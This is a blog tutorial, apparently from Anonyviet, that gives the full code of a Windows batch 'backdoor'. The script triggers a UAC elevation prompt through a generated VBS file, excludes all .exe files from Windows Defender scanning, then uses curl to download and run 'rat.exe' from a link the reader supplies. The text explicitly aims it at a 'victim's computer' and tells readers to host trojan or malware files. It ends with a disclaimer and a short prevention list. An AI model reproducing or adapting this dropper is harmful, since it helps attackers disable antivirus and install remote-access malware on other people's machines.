As we all know, in the cybersecurity industry, Backdoor is a malicious software that bypasses the authentication in a certain system, gaining unauthorized access. Not only that, hackers also use it to steal data, attack networks, etc. And today, I will guide you to create a simple Backdoor with just a simple Batch script. For those of you who do not know about Backdoor, please read this paragraph or you can find out here. Alright, let’s get to the point
Note: This article is for educational purposes only. Any illegal acts Anonyviet will not bear the full responsibility that you have caused
How to Create a Simple Backdoor with Just One Batch Script
To create a Backdoor, first create a file with the extension .bat and then copy the following code
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
set params = %*:"=""
echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
del "%temp%\getadmin.vbs"
exit /B
:gotAdmin
pushd "%CD%"
CD /D "%~dp0"
Powershell -Command "Set-MpPreference -ExclusionExtension exe"
cd %TEMP%
curl "paste link backdoor của bạn ở đây" -o rat.exe
rat.exe
In the above code, we need to change a bit in the second line of code from the bottom, please create a direct download link to your computer, make sure that the link contains trojan virus, malware, etc. you want, next name the backdoor that you want to download to the victim’s computer, I’ll name it rat.exe So we have created the Backdoor. Now I will explain how it works
The way it works is as follows:
This script grants administrator privileges, then downloads and executes a file named “rat.exe” from a remote server. First, I used the cacls command to check the above permissions. the system file is located at “%SYSTEMROOT%\system32\config\system”. If the command fails, the script will switch to the UACPrompt label, which will generate a VB (Visual Basic) script that prompts the victim to run the script with administrator privileges. If the cacls command gives no errors then the script jumps to the gotAdmin label and proceeds to execute the rest. We can see that the label gotAdmin changes to the directory containing the pushd and CD commands. It will then run a PowerShell command to set the option for file exclusion extensions to exe. Finally, it switches to the %TEMP% directory and uses the curl command to download “rat.exe” from a remote server. It will then run the downloaded file using the rat.exe command.
Thus, this Backdoor works very simply, if the machine installs 2 or more Antivirus, this Backdoor becomes useless and the victim will detect it. Here are some ways to prevent Backdoor for everyone to know and avoid
How to prevent Backdoor
1.Verify the origin and authenticity of any file or program before running
2.Update the latest anti-virus software versions
3.Do not download unknown software
4.Use Firewall
This is the end of the article, I hope you learn something from this article. Wishing you all a very nice day!
You can also read more articles Villain – Bypass AntiVirus hijacks Windows and Linux shells at website Anonyviet.com
